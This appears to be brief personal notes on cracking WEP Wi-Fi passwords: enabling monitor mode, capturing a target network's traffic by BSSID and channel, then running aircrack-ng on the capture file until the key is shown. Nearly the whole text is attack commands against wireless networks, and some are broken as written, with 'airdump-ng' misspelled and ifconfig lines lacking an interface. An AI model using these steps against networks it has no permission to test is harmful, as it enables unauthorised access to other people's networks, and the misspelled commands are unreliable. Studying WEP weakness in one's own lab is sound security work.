Wep crakcing
turn on monitor mode ( ifconfig down , iwconfig wlan0 mode monitor , ifconfig up ) 

step1 : airdump-ng wlan0 
step2 : find the bssid of the target network 
step3 : airdump-ng --bssid (bssid of the target newtwork) --channel (channel on which the network is ) --write (file name) wlan0 
step4 : aircrack-ng filename.cap 

----------------------------------------DONE PASSWORD CRACKED--------------------------------------------------------
there will be two key string number and ascii 
